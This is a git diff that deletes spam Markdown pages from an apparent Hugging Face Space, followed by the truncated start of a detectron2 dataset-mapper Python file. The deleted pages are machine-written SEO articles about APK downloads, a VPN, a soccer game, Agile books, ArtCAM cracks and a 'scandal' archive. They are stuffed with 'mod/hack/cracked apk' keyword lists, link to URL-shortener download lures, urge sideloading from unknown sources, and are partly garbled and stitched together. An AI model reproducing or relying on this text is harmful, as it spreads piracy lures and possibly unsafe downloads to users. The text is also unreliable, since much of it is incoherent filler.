      -truckers of europe 3 nuclear fusion reaction on pc
      -truckers of europe 3 king of the roads on pc
      -truckers of europe 3 heavy-duty trucks on pc
      -truckers of europe 3 brand-new trailers and trucks on pc
      -truckers of europe 3 variety of cargo selections on pc
      -truckers of europe 3 different chassis models on pc
      -truckers of europe 3 highways and country roads on pc
      -truckers of europe 3 real engine sounds on pc
      -truckers of europe 3 earn money and buy vehicles on pc
      -truckers of europe 3 choose your own job on pc
      -truckers of europe 3 transport your cargo on pc
      -truckers of europe 3 see a variety of cities on pc
      -truckers of europe 3 take trips around europe on pc
      -truckers of europe 3 learn to drive a truck like a pro on pc
      -truckers of europe 3 exciting simulation game for pc
      -truckers of europe 3 uninterrupted fun and action on pc
      -truckers of europe 3 safest gaming platform for privacy on pc
      -truckers of europe 3 fastest and lightest emulator for pc
      -truckers of europe 3 consume less cpu space and maintain stable fps on pc
      -truckers of europe 3 run different mobile games on pc
      -truckers of europe 3 switch between work and play with ease on pc
      -truckers of europe 3 access to inventive macros in the bluestacks macro community
      -truckers of europe 3 automate the predictable with macros
      -truckers of europe 3 multi instance sync feature
      -truckers of europe 3 script feature
      -truckers of europe 3 complete google sign-in to install the game
      -truckers of europe 3 click to install from the search results
      -truckers of europe 3 icon on the home screen to start playing
      -truckers of europe 3 game features enhancements

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/UFO VPN - The Fastest and Most Reliable VPN for Android - Download APK Here.md b/spaces/congsaPfin/Manga-OCR/logs/UFO VPN - The Fastest and Most Reliable VPN for Android - Download APK Here.md deleted file mode 100644 index 74582cff55017f68b9f674b9c1993b5a36d797ef..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/UFO VPN - The Fastest and Most Reliable VPN for Android - Download APK Here.md +++ /dev/null @@ -1,116 +0,0 @@ - -

      UFO Download APK: How to Get the Best VPN for Android

      -

      If you are looking for a fast, stable, and secure VPN service for your Android device, you might want to try UFO VPN. UFO VPN is a popular VPN app that offers unlimited data, multiple protocols, and access to over 2000 servers in 50 countries. In this article, we will show you how to download and install UFO VPN apk on your Android device, and how to use it to enjoy the best online experience.

      -

      ufo download apk


      Download »»» https://urlca.com/2uOeDI



      -

      What is UFO VPN?

      -

      UFO VPN is a VPN proxy created by Dreamfii, specially designed for Android devices with a UFO-fast speed, stable and secure Internet network. A VPN, or virtual private network, is a service that encrypts your internet traffic and routes it through a remote server, hiding your real IP address and location from prying eyes. With UFO VPN, you can:

      -
        -
      • Stream online TV shows and movies from Netflix, Hulu, Disney+, BBC iPlayer, and more.
      • -
      • Play mobile games with low latency and high speed.
      • -
      • Bypass geo-restrictions and censorship on websites and apps.
      • -
      • Protect your online privacy and security from hackers, ISPs, and government surveillance.
      • -
      • Access public Wi-Fi networks safely and anonymously.
      • -
      -

      Features of UFO VPN

      -

      UFO VPN has many features that make it stand out from other VPN apps. Some of them are:

      -
        -
      • One-click connection. All you have to do is open the app and tap the connect button. The internet is yours!
      • -
      • 2000+ servers in 50+ countries. Connect to locations all over the globe, so you can enjoy all the web information at home.
      • -
      • Unlimited data and unlimited bandwidth for all users, especially premium users.
      • -
      • Multiple protocols. Choose from TCP, UDP, IKEv2, or Shadowsocks protocols according to your needs.
      • -
      • No logs policy. UFO VPN does not collect or store any of your personal data or online activities.
      • -
      • Friendly customer support. Contact the support team via email or live chat anytime you need help.
      • -
      -

      Benefits of using UFO VPN

      -

      By using UFO VPN, you can enjoy many benefits that will enhance your online experience. Some of them are:

      -

      ufo vpn download apk
      -ufo vpn premium apk download
      -ufo vpn mod apk download
      -ufo vpn pro apk download
      -ufo vpn latest apk download
      -ufo vpn free download apk
      -ufo vpn unlocked apk download
      -ufo vpn full apk download
      -ufo vpn cracked apk download
      -ufo vpn hack apk download
      -ufo vpn android apk download
      -ufo vpn app download apk
      -ufo vpn old version apk download
      -ufo vpn new version apk download
      -ufo vpn update apk download
      -ufo vpn beta apk download
      -ufo vpn lite apk download
      -ufo vpn basic apk download
      -ufo vpn best free apk download
      -ufo vpn fast proxy apk download
      -ufo vpn unlimited apk download
      -ufo vpn secure wifi apk download
      -ufo vpn for pubg apk download
      -ufo vpn for firestick apk download
      -ufo vpn for pc apk download
      -ufo vpn for ios apk download
      -ufo vpn for windows apk download
      -ufo vpn for mac apk download
      -ufo vpn for linux apk download
      -ufo vpn for chrome apk download
      -ufo tv app download apk
      -ufo tv mod app download apk
      -ufo tv pro app download apk
      -ufo tv premium app download apk
      -ufo tv latest app download apk
      -ufo tv free app download apk
      -ufo tv unlocked app download apk
      -ufo tv full app download apk
      -ufo tv cracked app download apk
      -ufo tv hack app download apk
      -ufo tv android app download apk
      -ufo tv old version app download apk
      -ufo tv new version app download apk
      -ufo tv update app download apk
      -ufo tv beta app download apk
      -ufo tv lite app download apk
      -ufo tv basic app download apk
      -ufo tv best free app download apk
      -ufo tv fast proxy app download apk

      -
        -
      • You can access any content you want, no matter where you are. Whether it's a video streaming service, a social media platform, or a news website, you can unblock it with UFO VPN.
      • -
      • You can protect your online privacy and security from hackers, ISPs, and government surveillance. Your internet traffic will be encrypted and anonymized by UFO VPN, so no one can see what you do online or steal your personal information.
      • -
      • You can improve your network performance and speed. UFO VPN will automatically connect you to the fastest and most stable server available, so you can enjoy a smooth and lag-free internet connection.
      • -
      -

      How to download and install UFO VPN apk?

      -

      If you want to download and install UFO VPN apk on your Android device, you can follow these simple steps:

      -

      Step 1: Go to the official website of UFO VPN

      -

      The first thing you need to do is go to the official website of UFO VPN. You can use your browser or any other app to access the website.

      -

      Step 2: Choose the Android version and click on the download button

      -

      Once you are on the website, you will see a download button for the Android version of UFO VPN. Click on it and the download will start automatically. You can also scan the QR code on the website with your phone camera to download the app.

      -

      Step 3: Allow unknown sources on your device settings

      -

      Since you are downloading the app from a third-party source, you need to allow unknown sources on your device settings. To do this, go to Settings > Security > Unknown Sources and toggle it on. This will enable you to install apps from sources other than the Google Play Store.

      -

      Step 4: Open the downloaded file and install it

      -

      After the download is complete, you will find the UFO VPN apk file in your Downloads folder or in your notification bar. Tap on it and follow the instructions to install it on your device. It will take only a few seconds to complete the installation.

      -

      Step 5: Launch the app and enjoy the fast and secure VPN service

      -

      Now you are ready to use UFO VPN on your Android device. Launch the app and sign up for a free account or log in with your existing account. You can also use the app without an account, but you will have limited features and servers.

      -

      How to use UFO VPN apk?

      -

      Using UFO VPN apk is very easy and intuitive. Here are some steps to help you get started:

      -

      Select a server from the list or use the smart location feature

      -

      UFO VPN gives you access to over 2000 servers in 50 countries. You can choose any server you want from the list, or you can use the smart location feature to automatically connect to the best server for your location and network.

      -

      Tap on the connect button and wait for a few seconds

      -

      Once you have selected a server, tap on the connect button at the bottom of the screen. You will see a UFO icon spinning and a countdown timer. Wait for a few seconds until the connection is established.

      -

      Browse the internet with freedom and privacy

      -

      Congratulations! You are now connected to UFO VPN and you can browse the internet with freedom and privacy. You can check your IP address and location on the app, or you can visit any website or app you want without any restrictions or interference.

      -

      Conclusion

      -

      UFO VPN is one of the best VPN apps for Android devices. It offers unlimited data, multiple protocols, and access to over 2000 servers in 50 countries. It also has a one-click connection, a no logs policy, and a friendly customer support. You can download and install UFO VPN apk easily by following our guide above, and enjoy the best online experience with UFO VPN.

      -

      FAQs

      -
        -
      • Q: Is UFO VPN free?
      • -
      • A: UFO VPN has both a free version and a premium version. The free version has limited features and servers, while the premium version has more features and servers, as well as faster speed and better security. You can try the premium version for free for 7 days with a trial account.
      • -
      • Q: Is UFO VPN safe?
      • -
      • A: Yes, UFO VPN is safe to use. It encrypts your internet traffic and hides your IP address and location from prying eyes. It also has a no logs policy, which means it does not collect or store any of your personal data or online activities.
      • -
      • Q: Does UFO VPN work with Netflix?
      • -
      • A: Yes, UFO VPN works with Netflix and other streaming services. It can unblock geo-restricted content from Netflix, Hulu, Disney+, BBC iPlayer, and more. You can watch your favorite shows and movies from anywhere in the world with UFO VPN.
      • -
      • Q: How do I cancel my UFO VPN subscription?
      • -
      • A: If you want to cancel your UFO VPN subscription, you can do so by going to Settings > Account > Subscription > Cancel Subscription on the app. You can also contact the support team via email or live chat if you need any assistance.
      • -
      • Q: How do I contact UFO VPN support?
      • -
      • A: If you have any questions or issues with UFO VPN, you can contact the support team via email at support@ufovpn.io or via live chat on the app or website. They are available 24/7 to help you with anything you need.
      • -
      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/World Soccer Champs Data Pack APK The Ultimate Guide for Football Fans.md b/spaces/congsaPfin/Manga-OCR/logs/World Soccer Champs Data Pack APK The Ultimate Guide for Football Fans.md deleted file mode 100644 index 8f82f546f398f851d63cf31f3e9a702574cfa374..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/World Soccer Champs Data Pack APK The Ultimate Guide for Football Fans.md +++ /dev/null @@ -1,106 +0,0 @@ -
      -

      World Soccer Champs Data Pack APK: A Guide for Football Fans

      -

      If you are a football fan and you love playing soccer games on your Android device, you might have heard of World Soccer Champs, a popular and exciting game that lets you manage your team and compete in various leagues and cups from around the world. But did you know that you can also download a data pack APK that adds real player names to the game? In this article, we will tell you everything you need to know about World Soccer Champs and its data pack APK, and why you should give it a try.

      -

      world soccer champs data pack apk


      Download File ——— https://urlca.com/2uOf59



      -

      What is World Soccer Champs?

      -

      A fun and thrilling soccer game for Android devices

      -

      World Soccer Champs is a mobile football game developed by Monkey I-Brow Studios, a studio that specializes in creating sports games for Android devices. The game has been downloaded over 5 million times on Google Play, and has received positive reviews from players and critics alike. The game has a sleek interface, innovative gameplay, intelligent opponents, and realistic graphics that will immerse you in the electrifying drama of every match.

      -

      Features of the game

      -

      World Soccer Champs offers a variety of features that make it one of the best soccer games on Android. Some of these features are:

      -
        -
      • 200+ leagues and cups from all around the world, including local clubs and national teams. You can take your national team to Qatar and compete in the most prestigious soccer competition in the world, or choose from hundreds of other tournaments to test your skills.
      • -
      • Real player names with downloadable data pack. You can download a data pack APK that adds real player names to the game, so you can play with your favorite stars and legends. The data pack also updates regularly to reflect the latest transfers and ratings.
      • -
      • Huge database of 36.000 players and more than 3400 clubs. You can choose from a wide range of players and clubs to build your dream team. You can also customize your players' appearance, skills, attributes, and positions.
      • -
      • Simple to play, challenging to dominate. The game has intuitive swipe-controls that allow you to pass, dribble, shoot, tackle, and save with ease. You can also use different tactics, formations, and strategies to outsmart your opponents.
      • -
      • Google Play achievements & leaderboards to see who ranks on top. You can earn achievements for completing various tasks and challenges in the game, and compare your performance with other players on the global leaderboards.
      • -
      -

      What is the data pack APK?

      -

      A downloadable file that adds real player names to the game

      -

      The data pack APK is a file that you can download from the internet that adds real player names to World Soccer Champs. The file is not part of the official game, but it is created by fans who want to enhance their gaming experience. The data pack APK contains information about thousands of real players from different leagues and countries, such as their names, ratings, positions,

      How to download and install the data pack APK

      -

      To download and install the data pack APK, you need to follow these steps:

      -
        -
      1. Download the data pack APK file from a reliable source on the internet. You can search for "world soccer champs data pack apk" on Google or any other search engine, and choose a website that offers the file for free. Make sure you download the latest version of the file, which is compatible with the latest version of the game.
      2. -
      3. Enable unknown sources on your device. Before you can install the data pack APK, you need to allow your device to install apps from sources other than Google Play. To do this, go to your device's settings, then security, then unknown sources, and toggle it on.
      4. -
      5. Locate and install the data pack APK file. After you have downloaded the file, you need to find it on your device's storage, usually in the downloads folder. Tap on the file and follow the instructions to install it. You may need to grant some permissions to the app during the installation process.
      6. -
      7. Launch World Soccer Champs and enjoy. Once you have installed the data pack APK, you can open World Soccer Champs and see the real player names in the game. You can also check for updates in the game's settings, and download them if available.
      8. -
      -

      Why should you play World Soccer Champs with the data pack APK?

      -

      Benefits of playing with real player names

      -

      Playing World Soccer Champs with the data pack APK has many benefits that will enhance your gaming experience. Some of these benefits are:

      -
        -
      • More realism and immersion. Playing with real player names will make you feel like you are managing a real team and competing in real tournaments. You will be able to recognize your favorite players and their skills, and enjoy their realistic animations and celebrations.
      • -
      • More fun and challenge. Playing with real player names will also make the game more fun and challenging. You will be able to test your knowledge of football and compare your results with real-life outcomes. You will also face tougher opponents and more varied strategies from different teams.
      • -
      • More customization and creativity. Playing with real player names will also give you more options to customize and create your own team. You will be able to mix and match players from different clubs and countries, and create your own fantasy squad. You will also be able to edit your players' names, ratings, attributes, and positions if you want.
      • -
      -

      Tips and tricks for playing World Soccer Champs

      -

      To help you get started with playing World Soccer Champs with the data pack APK, here are some tips and tricks that will improve your performance and enjoyment:

      -

      world soccer champs game download apk
      -world soccer champs mod apk unlimited money
      -world soccer champs 2023 data pack
      -world soccer champs apk latest version
      -world soccer champs hack apk download
      -world soccer champs real player names apk
      -world soccer champs offline apk
      -world soccer champs apk for android
      -world soccer champs data pack free
      -world soccer champs apk pure
      -world soccer champs mod apk revdl
      -world soccer champs data pack update
      -world soccer champs apk obb
      -world soccer champs hack apk 2023
      -world soccer champs data pack download link
      -world soccer champs mod apk android 1
      -world soccer champs data pack file
      -world soccer champs apk mirror
      -world soccer champs hack apk ios
      -world soccer champs data pack install
      -world soccer champs mod apk rexdl
      -world soccer champs data pack 2023 download
      -world soccer champs apk uptodown
      -world soccer champs hack apk online
      -world soccer champs data pack how to use
      -world soccer champs mod apk unlimited coins
      -world soccer champs data pack reddit
      -world soccer champs apk mod menu
      -world soccer champs hack apk no root
      -world soccer champs data pack error
      -world soccer champs mod apk happymod
      -world soccer champs data pack not working
      -world soccer champs apk old version
      -world soccer champs hack apk 2023 download
      -world soccer champs data pack zip file download
      -world soccer champs mod apk all unlocked
      -world soccer champs data pack latest version
      -world soccer champs apk no ads
      -world soccer champs hack apk unlimited everything
      -world soccer champs data pack size
      -world soccer champs mod apk offline
      -world soccer champs data pack google drive link
      -world soccer champs apk pro
      -world soccer champs hack apk modded
      -world soccer champs data pack folder name
      -world soccer champs mod apk online multiplayer

      -
        -
      • Choose a suitable difficulty level. The game has four difficulty levels: easy, normal, hard, and expert. You can choose the one that suits your skill level and preference. The higher the difficulty level, the more intelligent and aggressive your opponents will be.
      • -
      • Use different tactics and formations. The game allows you to choose from various tactics and formations for your team. You can change them before or during a match, depending on the situation. You can also customize your own tactics and formations by adjusting sliders for passing, pressing, width, etc.
      • -
      • Swipe smartly and accurately. The game uses swipe-controls for passing, shooting, dribbling, tackling, and saving. You need to swipe smartly and accurately to execute these actions successfully. The direction, speed, length, and timing of your swipe will determine the outcome of your action.
      • -
      • Manage your team wisely. The game also requires you to manage your team wisely. You need to balance your budget, scout new players, train your players, rotate your squad, deal with injuries, etc. You also need to keep an eye on your team's morale, chemistry, and fatigue levels.
      • -
      • Have fun and experiment. The most important tip is to have fun and experiment with different aspects of the game. You can try different teams, players, tactics, formations, etc., and see what works best for you. You can also challenge yourself by setting goals or playing in different modes.
      • -
      -

      Conclusion

      -

      Summary of the main points

      -

      In conclusion, World Soccer Champs is a fantastic soccer game for Android devices that offers a lot of features and fun for football fans. The game becomes even better when you download and install the data pack APK that adds real player names to the game. The data pack

      Call to action and invitation to download the game and the data pack APK

      -

      If you are looking for a soccer game that is easy to play, hard to master, and full of realism and excitement, you should definitely download World Soccer Champs and its data pack APK. You will not regret it, as you will have hours of fun and challenge with this amazing game. You can download World Soccer Champs from Google Play for free, and you can find the data pack APK from various websites on the internet. Just follow the steps we mentioned above, and you will be ready to enjoy the game with real player names. Don't wait any longer, download World Soccer Champs and its data pack APK today, and become the ultimate soccer champion!

      -

      FAQs

      -

      Q1: Is World Soccer Champs free to play?

      -

      A1: Yes, World Soccer Champs is free to play. You can download it from Google Play without paying anything. However, the game does have some optional in-app purchases that can enhance your gaming experience, such as removing ads, unlocking all leagues and cups, or buying coins and gems.

      -

      Q2: How many leagues and cups are available in World Soccer Champs?

      -

      A2: World Soccer Champs has over 200 leagues and cups from all around the world. You can play in local clubs or national teams, and compete in various tournaments, such as the World Cup, the Champions League, the Copa America, the Euro Cup, etc.

      -

      Q3: How can I update the data pack APK?

      -

      A3: You can update the data pack APK by downloading the latest version of the file from the internet. You can check for updates in the game's settings, or on the website where you downloaded the file. You can also uninstall and reinstall the data pack APK if you encounter any problems.

      -

      Q4: Can I play World Soccer Champs offline?

      -

      A4: Yes, you can play World Soccer Champs offline. You don't need an internet connection to play the game, except for downloading updates or accessing some online features, such as achievements and leaderboards.

      -

      Q5: How can I contact the developers of World Soccer Champs?

      -

      A5: You can contact the developers of World Soccer Champs by sending them an email at monkeyibrow@gmail.com. You can also follow them on Facebook or Twitter for news and updates about the game.

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Agile Project Management For Dummies Pdf Download !FREE!.md b/spaces/contluForse/HuggingGPT/assets/Agile Project Management For Dummies Pdf Download !FREE!.md deleted file mode 100644 index d19d979181ba73a337934193c31785b09b24984f..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Agile Project Management For Dummies Pdf Download !FREE!.md +++ /dev/null @@ -1,30 +0,0 @@ -
      -

      In today's time-crunched, cost-conscious global business environment, tight project deadlines and stringent expectations are the norm. Now with 25% new and updated content, Project Management For Dummies, 3rd Edition introduces you to the principles of successful project management and shows you how to motivate any team to gain maxim...

      -

      In today's time-crunched, cost-conscious global business environment, tight project deadlines and stringent expectations are the norm. So how can you juggle all the skills and responsibilities it takes to shine as a project management maven? Updated in a brand-new edition, Project Management For Dummies offers everything you need to ...

      -

      agile project management for dummies pdf download


      Download 🆗 https://ssurll.com/2uzxdL



      -

      The Manifesto for Agile Software Development, commonly known as the Agile Manifesto, is an intentionally streamlined expression of the core values of agile project management and product development. Use this manifesto as a guide to implement agile practices into your products.

      -

      This first edition comes in paperback, almost one-inch thick. It has 360 pages and was published in April 2012 under the For Dummies brand of Wiley Publishing. The front cover looks like other books of the same series, with the familiar black and yellow theme. The back cover contains more descriptions of the content and benefits of using agile project management. ISBN-10: 1118026241; ISBN-13: 978-1118026243.

      -

      Agile Project Management for Dummies is meant for every project manager, project team member, or project stakeholder. In other words, it is for any regular person who has been, is presently, or will be involved in projects, traditional or agile, in a business or organizational setting. It will be valuable for those who are interested to know more about agile practices and methodologies with the intention of applying it to realize its promoted benefits.

      -

      Eddie (Goodreads) who has knowledge and experience with traditional project methodology for software development felt more confident and ready to tackle in-depth agile PM topics after reading it. He also differentiated it with the other more basic books of the series, and complimented it for giving the reader a more solid foundation.

      -

      Agile Project Management for Dummies is divided in six parts with a total of 20 chapters. The first part introduces agile PM for a better understanding of the reader. The second part describes the effects of following agile practices while the third part shows the reader how to work on an agile project. The fourth part provides the reader practical knowledge in managing different PM areas using an agile approach. The fifth part has discussions on how to ensure success while the sixth part gives more information on agile benefits, metrics, and resources.

      -

      -

      Agile Project Management is an affordable book that gives more than just an introduction about a very popular business management technique. According to the author, agile PM is now being applied to more and more industries and functions such as infrastructure, finance, and even recruitment, aside from software development. Learning about this flexible framework gives people the ability to apply it to their specific domain knowledge and come up quickly with a solution that really works.

      -

      Scrum is an agile project management framework that helps teams structure and manage their work through a set of values, principles, and practices. Much like a rugby team (where it gets its name) training for the big game, scrum encourages teams to learn through experiences, self-organize while working on a problem, and reflect on their wins and losses to continuously improve.

      -

      Agile project management is an iterative, incremental way to coordinate activities for engineering, information technology, and other business areas. Because it is a highly flexible, interactive methodology, teams can quickly identify and respond to challenges, and ultimately deliver better outcomes, faster.

      -

      An agile project plan is based on features. The plan estimates how long it will take for each feature to be delivered, without much detail on how it will be delivered. And because the project plans are focused on features, you can group similar features into sprints.

      -

      Also known as an agile project schedule, this template lets you add your tasks, who is responsible, start and end dates, and status. The duration for each task will be automatically calculated. This template also features a Gantt chart (a visual representation of your project timeline), which will automatically adjust when you add your own data to the table.

      -


      Agile project management empowers teams to adapt to change with increased speed and flexibility. Learn how to implement Agile PM and get the most out of the methodology.

      Get the free e-book

      -

      An agile roadmap represents a strategic overview of where the product is headed in the mid-to long-term. It steers the direction of your product and sets expectations within your company. A traditional roadmap can sometimes act as a strict project plan, but in an agile organization, the roadmap just provides guidance and clarity.

      -

      Instead of a static testing plan that must happen at a certain time, test plans in agile projects should be dynamic and iterative. The testing phase becomes an extension of the requirements prioritization process so that the most up-to-date information is used when defining tests and to avoid any misunderstanding about scope.

      -

      Super-adaptable, Agile project management is an incremental and non-linear approach to project management. It focuses on breaking down large projects into more manageable tasks, which are completed in short iterations throughout the project life cycle. Teams that adopt the Agile methodology are able to complete work faster, adapt to changing project requirements, and optimize their workflow.

      -

      Agile project management may seem like a 21st century phenomenon, but it has its roots in the rapid application development (RAD), pioneered by English IT engineer James Martin in the 1990s in software development.

      -

      Originally created for software development, the Agile approach to project management is quickly being adapted by more than just IT teams. Some industries also looking at the Agile methodology and other Agile frameworks to deliver innovative products in uncertain environments include:

      -

      As sophisticated as technology gets, the human element will always serve as an important role in any kind of project management. Relying too heavily on processes and tools results in an inability to adapt to changing circumstances.

      -

      This value is one of the biggest departures from traditional project management. Historically, change was seen as an expense, and one to be avoided. Agile allows for continuous change throughout the life of any given project. Each sprint provides an opportunity for review and course correction.

      -

      In traditional waterfall project management, there is one implementation date that comes after an entire project has been developed. When using Agile, however, your project uses shorter development cycles (called sprints) with features released at the end of each cycle.

      -

      Resistance to change is a common pitfall. Waterfall project management remains top of the tree and the go-to for companies reluctant to try out new workflows. There could be a lack of support from management, who want old-fashioned measurables, or colleagues who just want to be told what to do.

      -

      There are a wide range of Agile project management tools available. The best one can depend on your business, industry and any priority areas. Some of the most popular frameworks to implement an Agile methodology include:

      -

      These are the most basic and important parts of Agile project management. As you transition your team to an Agile methodology, these processes, Agile software and tools, roles and principles will help you change your mindset and begin working together to be more flexible and adapt to changes as they come.

      -

      As a new world order is formed, entrepreneurial teams and engineering aproaches with small but quick and can mobilize collectively, reaching customers without extending market access time, are preferred instead of the traditional project method. Despite these preferences, the number of leaders in academia and business who adapt into the concept of agile engineering teams recently has been steadily decreasing. The study consists the literature review on introduction, the definition of the model which the criteria are shared in and the result stage and explains the relationship of R&D expenses from national income in OECD countries and the patent numbers of engineering management information systems, teams with the concept of agile models.

      aaccfb2cb3
      -
      -
      \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Artcam Pro 2012 Free WORK Download.md b/spaces/contluForse/HuggingGPT/assets/Artcam Pro 2012 Free WORK Download.md deleted file mode 100644 index eeadc1f96611490168809292f7e68827bd173e39..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Artcam Pro 2012 Free WORK Download.md +++ /dev/null @@ -1,11 +0,0 @@ -

      artcam pro 2012 free download


      Download Ziphttps://ssurll.com/2uzwKu



      - -March 5, 2020 - Download artcam 2012 Pro SP2 32bit 64bit full Crack 100% working link Artcam pro 2012 32bit 64bit full resolution Delcam ArtCAM 2012 SP2. Description of the program ArtCAM Pro 2012 SP2 is a very powerful vector graphics editor that creates and models 3D models. -ArtCAM Pro - 2D and 3D development software. -The free version of ArtCAM Pro allows you to do. -ArtCAM Pro - software for developing 3D models and creating reliefs. -The ArtCAM 2010 Pro program is designed to create spatial models of parts and prepare them for subsequent manufacturing on CNC machines. -This is software. 8a78ff9644
      -
      -
      -

      diff --git a/spaces/contluForse/HuggingGPT/assets/Bertolini Materiali Da Costruzione Vol 1 Torrent Everything You Need to Know about Construction Materials in One Volume.md b/spaces/contluForse/HuggingGPT/assets/Bertolini Materiali Da Costruzione Vol 1 Torrent Everything You Need to Know about Construction Materials in One Volume.md deleted file mode 100644 index 38e5b938a648581ebe9ab8f9b231f46bf33623bf..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Bertolini Materiali Da Costruzione Vol 1 Torrent Everything You Need to Know about Construction Materials in One Volume.md +++ /dev/null @@ -1,6 +0,0 @@ -

      [FSX P3D] Drzewiecki Design - Washington X v1.25 version download


      Download →→→ https://ssurll.com/2uzw5G



      -
      - aaccfb2cb3
      -
      -
      -

      diff --git a/spaces/contluForse/HuggingGPT/assets/Edison Chen Scandal.rar [VERIFIED].md b/spaces/contluForse/HuggingGPT/assets/Edison Chen Scandal.rar [VERIFIED].md deleted file mode 100644 index 2f063c8e3a2ed350c5e3e0ed2523d4cc704087a1..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Edison Chen Scandal.rar [VERIFIED].md +++ /dev/null @@ -1,6 +0,0 @@ -

      Edison Chen Scandal.rar


      DOWNLOADhttps://ssurll.com/2uzyN5



      -
      -Download edison chen Torrents absolutely for free, Magnet Link And Direct Download also Available. ... Hot Asian Girl Huge Collection edison Chen Pics 2008 rar. 0043.00 ... Edison Chen Sex Photos Scandal Starring Slutty Cecilia Cheung,. 1fdad05405
      -
      -
      -

      diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mediapipe_face/__init__.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mediapipe_face/__init__.py deleted file mode 100644 index f74edfb187e4e39583ed92bfe69ea29c42a34ddc..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mediapipe_face/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from .mediapipe_face_common import generate_annotation - - -def apply_mediapipe_face(image, max_faces: int = 1, min_confidence: float = 0.5): - return generate_annotation(image, max_faces, min_confidence) diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/__init__.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/__init__.py deleted file mode 100644 index ac66d3cfe0ea04af45c0f3594bf135841c3812e3..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/__init__.py +++ /dev/null @@ -1,28 +0,0 @@ -from .ann_head import ANNHead -from .apc_head import APCHead -from .aspp_head import ASPPHead -from .cc_head import CCHead -from .da_head import DAHead -from .dm_head import DMHead -from .dnl_head import DNLHead -from .ema_head import EMAHead -from .enc_head import EncHead -from .fcn_head import FCNHead -from .fpn_head import FPNHead -from .gc_head import GCHead -from .lraspp_head import LRASPPHead -from .nl_head import NLHead -from .ocr_head import OCRHead -# from .point_head import PointHead -from .psa_head import PSAHead -from .psp_head import PSPHead -from .sep_aspp_head import DepthwiseSeparableASPPHead -from .sep_fcn_head import DepthwiseSeparableFCNHead -from .uper_head import UPerHead - -__all__ = [ - 'FCNHead', 'PSPHead', 'ASPPHead', 'PSAHead', 'NLHead', 'GCHead', 'CCHead', - 'UPerHead', 'DepthwiseSeparableASPPHead', 'ANNHead', 'DAHead', 'OCRHead', - 'EncHead', 'DepthwiseSeparableFCNHead', 'FPNHead', 'EMAHead', 'DNLHead', - 'APCHead', 'DMHead', 'LRASPPHead' -] diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/data/dataset_mapper.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/data/dataset_mapper.py deleted file mode 100644 index 3bb6bb1057a68bfb12e55872f391065f02023ed3..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/data/dataset_mapper.py +++ /dev/null @@ -1,191 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import copy -import logging -import numpy as np -from typing import List, Optional, Union -import torch - -from annotator.oneformer.detectron2.config import configurable - -from . import detection_utils as utils -from . import transforms as T - -""" -This file contains the default mapping that's applied to "dataset dicts". -""" - -__all__ = ["DatasetMapper"] - - -class DatasetMapper: - """ - A callable which takes a dataset dict in Detectron2 Dataset format, - and map it into a format used by the model. - - This is the default callable to be used to map your dataset dict into training data. - You may need to follow it to implement your own one for customized logic, - such as a different way to read or transform images. - See :doc:`/tutorials/data_loading` for details. - - The callable currently does the following: - - 1. Read the image from "file_name" - 2. Applies cropping/geometric transforms to the image and annotations - 3. Prepare data and annotations to Tensor and :class:`Instances` - """ - - @configurable - def __init__( - self, - is_train: bool, - *, - augmentations: List[Union[T.Augmentation, T.Transform]], - image_format: str, - use_instance_mask: bool = False, - use_keypoint: bool = False, - instance_mask_format: str = "polygon", - keypoint_hflip_indices: Optional[np.ndarray] = None, - precomputed_proposal_topk: Optional[int] = None, - recompute_boxes: bool = False, - ): - """ - NOTE: this interface is experimental. - - Args: - is_train: whether it's used in training or inference - augmentations: a list of augmentations or deterministic transforms to apply - image_format: an image format supported by :func:`detection_utils.read_image`. - use_instance_mask: whether to process instance segmentation annotations, if available - use_keypoint: whether to process keypoint annotations if available - instance_mask_format: one of "polygon" or "bitmask". Process instance segmentation - masks into this format. - keypoint_hflip_indices: see :func:`detection_utils.create_keypoint_hflip_indices` - precomputed_proposal_topk: if given, will load pre-computed - proposals from dataset_dict and keep the top k proposals for each image. - recompute_boxes: whether to overwrite bounding box annotations - by computing tight bounding boxes from instance mask annotations. - """ - if recompute_boxes: - assert use_instance_mask, "recompute_boxes requires instance masks" - # fmt: off - self.is_train = is_train - self.augmentations = T.AugmentationList(augmentations) - self.image_format = image_format - self.use_instance_mask = use_instance_mask - self.instance_mask_format = instance_mask_format - self.use_keypoint = use_keypoint - self.keypoint_hflip_indices = keypoint_hflip_indices - self.proposal_topk = precomputed_proposal_topk - self.recompute_boxes = recompute_boxes - # fmt: on - logger = logging.getLogger(__name__) - mode = "training" if is_train else "inference" - logger.info(f"[DatasetMapper] Augmentations used in {mode}: {augmentations}") - - @classmethod - def from_config(cls, cfg, is_train: bool = True): - augs = utils.build_augmentation(cfg, is_train) - if cfg.INPUT.CROP.ENABLED and is_train: - augs.insert(0, T.RandomCrop(cfg.INPUT.CROP.TYPE, cfg.INPUT.CROP.SIZE)) - recompute_boxes = 